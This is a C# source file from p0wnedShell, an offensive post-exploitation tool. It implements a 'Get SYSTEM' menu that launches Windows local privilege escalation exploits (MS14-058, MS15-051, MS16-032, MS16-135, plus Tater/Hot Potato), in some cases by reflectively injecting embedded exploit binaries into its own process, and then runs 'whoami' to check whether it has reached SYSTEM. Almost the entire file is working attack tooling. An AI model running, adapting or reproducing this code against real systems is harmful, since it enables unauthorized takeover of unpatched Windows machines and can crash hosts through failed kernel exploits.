﻿using System;
using System.Globalization;

namespace p0wnedShell
{
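    /// <summary>
    /// "Get SYSTEM" menu of p0wnedShell: a Sherlock patch-level scan, the Tater (Hot Potato)
    /// menu, and four local privilege escalation exploits (MS14-058, MS15-051, MS16-032, MS16-135).
    /// Every exploit entry sends a PowerShell command through the embedded runspace
    /// (<see cref="P0wnedListener"/>); the ones that are expected to elevate the current process
    /// afterwards run "whoami" and report success or failure from its output.
    /// </summary>
    /// <remarks>
    /// Operator caveats: MS14-058, MS15-051 and MS16-135 are win32k kernel exploits - a failed
    /// attempt on a patched or unexpected build can crash the host rather than merely fail, so only
    /// fire them where a bugcheck is acceptable. The success check is a loose substring match on
    /// the "whoami" output (see <see cref="LooksLikeSystem"/>), not a token inspection.
    /// </remarks>
    class Exploits
    {
        private static readonly P0wnedListenerConsole P0wnedListener = new P0wnedListenerConsole();

        // Highest RtlGetVersion() value (major.minor) on which MS14-058 and MS15-051 are attempted:
        // 6.3 = Windows 8.1 / Server 2012 R2. Windows 10 reports 10.0 and is refused up front.
        // NOTE(review): a "major.minor" decimal only orders correctly while minor < 10.
        private const decimal LatestOSVersion = 6.3m;

        /// <summary>Prints the section banner for this menu.</summary>
        public static void PowerBanner()
        {
            string[] toPrint = { "* Get SYSTEM Privileges using various Exploits/Vulnerabilities.     *" };
            Program.PrintBanner(toPrint);
        }

        /// <summary>
        /// Shows the exploit menu, reads a choice in 1..7 and dispatches it. 7 (and a closed
        /// stdin) returns to the caller.
        /// </summary>
        public static void Menu()
        {
            PowerBanner();
            Console.WriteLine(" 1. Use Sherlock to find Local Privilege Escalation Vulnerabilities.");
            Console.WriteLine();
            Console.WriteLine(" 2. Tater \"The Posh Hot Potato\" Windows Privilege Escalation exploit.");
            Console.WriteLine();
            Console.WriteLine(" 3. Get SYSTEM using the MS14-058 TrackPopupMenu Win32k NULL Pointer Dereference Exploit.");
            Console.WriteLine();
            Console.WriteLine(" 4. Get SYSTEM using the MS15-051 Windows ClientCopyImage Win32k Exploit.");
            Console.WriteLine();
            Console.WriteLine(" 5. Get SYSTEM using the MS16-032 Leaked Thread Handle Exploit.");
            Console.WriteLine();
            Console.WriteLine(" 6. Get SYSTEM using the MS16-135 Win32k.sys NtSetWindowLongPtr Exploit.");
            Console.WriteLine();
            Console.WriteLine(" 7. Back.");
            Console.Write("\nEnter choice: ");

            int userInput = ReadMenuChoice(1, 7);

            switch (userInput)
            {
                case 1:
                    Sherlock();
                    break;
                case 2:
                    Potato.TaterMenu();
                    break;
                case 3:
                    MS14_058();
                    break;
                case 4:
                    MS15_051();
                    break;
                case 5:
                    MS16_032();
                    break;
                case 6:
                    MS16_135();
                    break;
                default:
                    break;
            }
        }

        /// <summary>
        /// Reads console lines until one parses as an integer in [min, max] and returns it, printing
        /// the usual red "Wrong choice" prompt on every rejected line.
        /// </summary>
        /// <returns>The accepted choice, or <paramref name="max"/> (the "Back" entry) when stdin is closed.</returns>
        private static int ReadMenuChoice(int min, int max)
        {
            while (true)
            {
                string line = Console.ReadLine();
                if (line == null)
                {
                    // EOF: Convert.ToInt32(null) used to yield 0 here and the loop spun forever on a
                    // piped / non-interactive session. Treat a closed stdin as "Back".
                    return max;
                }

                int choice;
                bool parsed = int.TryParse(line, NumberStyles.Integer, CultureInfo.InvariantCulture, out choice);
                if (parsed && choice >= min && choice <= max)
                {
                    return choice;
                }

                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("\n[+] Wrong choice, please try again!\n");
                Console.ResetColor();
                Console.Write("Enter choice: ");
            }
        }

        /// <summary>Prints <paramref name="prompt"/> and blocks until the operator presses Enter.</summary>
        private static void PauseForEnter(string prompt)
        {
            Console.WriteLine(prompt);
            Console.ReadLine();
        }

        /// <summary>
        /// Sends one PowerShell command to the embedded runspace; an exception from the listener is
        /// printed and swallowed so the caller can still run its post-exploit check.
        /// </summary>
        private static void RunListenerCommand(string command)
        {
            try
            {
                P0wnedListener.Execute(command);
            }
            catch (Exception e)
            {
                Console.WriteLine(e.Message);
            }
        }

        /// <summary>
        /// Verifies that the p0wnedShell process bitness matches the OS bitness, which the
        /// PE-injecting exploits need because the injected binary is selected per architecture.
        /// On a mismatch the red warning is printed, Enter is awaited and false is returned.
        /// </summary>
        /// <param name="osArch">Receives "x64" or "x86" for the operating system.</param>
        private static bool ArchitectureMatches(out string osArch)
        {
            osArch = Pshell.EnvironmentHelper.Is64BitOperatingSystem() ? "x64" : "x86";
            string procArch = Pshell.EnvironmentHelper.Is64BitProcess() ? "x64" : "x86";

            if (procArch == osArch)
            {
                return true;
            }

            Console.ForegroundColor = ConsoleColor.Red;
            Console.WriteLine("[+] Your OS Architectecture does not match the version of p0wnedShell you run.");
            Console.WriteLine("[+] To run this Exploit, you should run the " + osArch + " version of p0wnedShell\n");
            Console.ResetColor();
            PauseForEnter("Press Enter to Continue...");
            return false;
        }

        /// <summary>
        /// Refuses to run <paramref name="bulletin"/> on anything newer than
        /// <see cref="LatestOSVersion"/> (Windows 8.1 / Server 2012 R2), printing the red notice and
        /// waiting for Enter. Returns true when the OS version is within range.
        /// </summary>
        private static bool OsVersionSupported(string bulletin)
        {
            if (!(Pshell.EnvironmentHelper.RtlGetVersion() > LatestOSVersion))
            {
                return true;
            }

            Console.ForegroundColor = ConsoleColor.Red;
            Console.WriteLine("[+] " + bulletin + " is only exploitable on Windows 8.1/2012 R2 or lower.\n");
            Console.ResetColor();
            PauseForEnter("Press Enter to Continue...");
            return false;
        }

        /// <summary>
        /// Loose heuristic for "the exploit worked": true when the captured "whoami" output contains
        /// "system" (ordinal, case-insensitive). Null or empty output - e.g. after RunPSCommand
        /// threw - counts as failure instead of crashing on a null dereference as the old code did.
        /// </summary>
        /// <remarks>
        /// Known limitations, kept for compatibility: any account or domain name containing
        /// "system" also matches, and on a localized Windows where the SYSTEM account name is
        /// translated the match may miss a genuine success. Treat the result as an indication,
        /// not proof - inspect the token if it matters.
        /// </remarks>
        internal static bool LooksLikeSystem(string whoamiOutput)
        {
            if (string.IsNullOrEmpty(whoamiOutput))
            {
                return false;
            }
            return whoamiOutput.IndexOf("system", StringComparison.OrdinalIgnoreCase) != -1;
        }

        /// <summary>
        /// Runs "whoami" through the PowerShell runspace and prints the green success / red
        /// "probably patched" verdict based on <see cref="LooksLikeSystem"/>, then waits for Enter.
        /// </summary>
        private static void ReportElevationResult()
        {
            Console.ForegroundColor = ConsoleColor.Red;
            Console.WriteLine("\n[+] let's check if our exploit succeeded:\n");
            Console.ResetColor();

            string whoamiOutput = null;
            try
            {
                whoamiOutput = Pshell.RunPSCommand("whoami");
            }
            catch (Exception e)
            {
                Console.WriteLine(e.Message);
            }

            if (LooksLikeSystem(whoamiOutput))
            {
                Console.ForegroundColor = ConsoleColor.Green;
                Console.WriteLine("[+] The Ring has awoken, it’s heard its masters call :)\n");
                Console.ResetColor();
                PauseForEnter("Press Enter to Continue and Get The Party Started...");
            }
            else
            {
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("[+] Exploit failed, System probably already patched!\n");
                Console.ResetColor();
                PauseForEnter("Press Enter to Continue...");
            }
        }

        /// <summary>
        /// Runs Sherlock's Find-AllVulns (provided by a module loaded elsewhere in p0wnedShell) to
        /// list missing local privilege escalation patches. Its findings are a hint about which of
        /// the exploits below may work, not a guarantee.
        /// </summary>
        public static void Sherlock()
        {
            string[] toPrint = { "* Use Sherlock to find Local Privilege Escalation Vulnerabilities.  *" };
            Program.PrintBanner(toPrint);

            Console.WriteLine("[+] Please wait while Sherlock is enumerating...");
            RunListenerCommand("Find-AllVulns");
            PauseForEnter("Press Enter to Continue...");
        }

        /// <summary>
        /// MS14-058 (win32k TrackPopupMenu NULL pointer dereference): reflectively injects the
        /// architecture-matching exploit PE into this process and then checks "whoami".
        /// Requires process/OS bitness to match and an OS no newer than 8.1 / 2012 R2.
        /// </summary>
        public static void MS14_058()
        {
            string[] toPrint = { "* Get into Ring0 using the MS14-058 Vulnerability.                  *" };
            Program.PrintBanner(toPrint);

            string osArch;
            if (!ArchitectureMatches(out osArch))
            {
                return;
            }
            if (!OsVersionSupported("MS14-058"))
            {
                return;
            }

            Console.ForegroundColor = ConsoleColor.Yellow;
            Console.WriteLine("This Exploit can only succeed when patch KB3000061 is not installed on this system.\n");
            Console.ResetColor();
            Console.Write("[+] Please wait until loaded...\n");
            Console.WriteLine();

            // Binaries.MS14_058 yields the exploit PE as a space-separated byte string; "-split ' '"
            // turns it back into a byte array for Invoke-ReflectivePEInjection. "whoami.exe" is handed
            // to the exploit as its -ExeArgs (presumably the program it runs once elevated).
            string MS14_058 = "Invoke-ReflectivePEInjection -PEBytes (\"" + Binaries.MS14_058(osArch) + "\" -split ' ') -ExeArgs \"whoami.exe\" -Verbose";
            RunListenerCommand(MS14_058);

            ReportElevationResult();
        }

        /// <summary>
        /// MS15-051 (win32k ClientCopyImage): reflectively injects the architecture-matching
        /// exploit PE into this process and then checks "whoami". Same preconditions as MS14-058.
        /// </summary>
        public static void MS15_051()
        {
            string[] toPrint = { "* Get into Ring0 using the MS15-051 Vulnerability.                  *" };
            Program.PrintBanner(toPrint);

            string osArch;
            if (!ArchitectureMatches(out osArch))
            {
                return;
            }
            if (!OsVersionSupported("MS15-051"))
            {
                return;
            }

            Console.ForegroundColor = ConsoleColor.Yellow;
            Console.WriteLine("This Exploit can only succeed when patch KB3045171 is not installed on this system.\n");
            Console.ResetColor();
            Console.Write("[+] Please wait until loaded...\n");
            Console.WriteLine();

            // Same injection pattern as MS14-058, without -ExeArgs.
            string MS15_051 = "Invoke-ReflectivePEInjection -PEBytes (\"" + Binaries.MS15_051(osArch) + "\" -split ' ') -Verbose";
            RunListenerCommand(MS15_051);

            ReportElevationResult();
        }

        /// <summary>
        /// MS16-032 (leaked thread handle race): runs the PowerShell PoC Invoke-MS16-032. Unlike the
        /// win32k exploits it does not elevate this process but pops a separate SYSTEM cmd window
        /// when it wins the race, so there is no "whoami" check here - the operator looks for the
        /// window.
        /// </summary>
        public static void MS16_032()
        {
            string[] toPrint = { "* Exploiting a Leaked Thread Handle using the pOsh version of the   *",
                                 "* MS16-032 exploit By @tiraniddo and @FuzzySec                      *" };
            Program.PrintBanner(toPrint);

            Console.ForegroundColor = ConsoleColor.Green;
            Console.WriteLine("Notes by @FuzzySec:");
            Console.ForegroundColor = ConsoleColor.Yellow;
            Console.WriteLine();
            Console.WriteLine("* In order for the race condition to succeed the machine must have 2+ CPU");
            Console.WriteLine("  cores. If testing in a VM just make sure to add a core if needed mkay.");
            Console.WriteLine("* The exploit is pretty reliable, however ~1/6 times it will say it succeeded");
            Console.WriteLine("  but not spawn a shell. Not sure what the issue is but just re-run and profit!");
            Console.WriteLine("* Want to know more about MS16-032 ==>");
            Console.WriteLine("  https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html\n");
            Console.ResetColor();

            RunListenerCommand("Invoke-MS16-032");

            Console.ForegroundColor = ConsoleColor.Green;
            Console.WriteLine("\n[+] If succeeded this exploit should popup a System CMD Shell");
            Console.WriteLine("[+] If not... Try again, or accept that the System is already patched.\n");
            Console.ResetColor();
            PauseForEnter("Press Enter to Continue...");
        }

        /// <summary>
        /// MS16-135 / CVE-2016-7255 (win32k NtSetWindowLongPtr): runs the PowerShell PoC
        /// Invoke-MS16-135 and then checks "whoami". Requires matching process/OS bitness; note
        /// that, unlike MS14-058/MS15-051, no OS version gate is applied before firing it.
        /// </summary>
        public static void MS16_135()
        {
            string[] toPrint = { "* Exploiting win32k.sys NtSetWindowLongPtr (CVE-2016-7255)          *",
                                 "* MS16-135 exploit By @TinySecEx and @FuzzySec                      *" };
            Program.PrintBanner(toPrint);

            string osArch;
            if (!ArchitectureMatches(out osArch))
            {
                return;
            }

            RunListenerCommand("Invoke-MS16-135");

            ReportElevationResult();
        }
    }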
}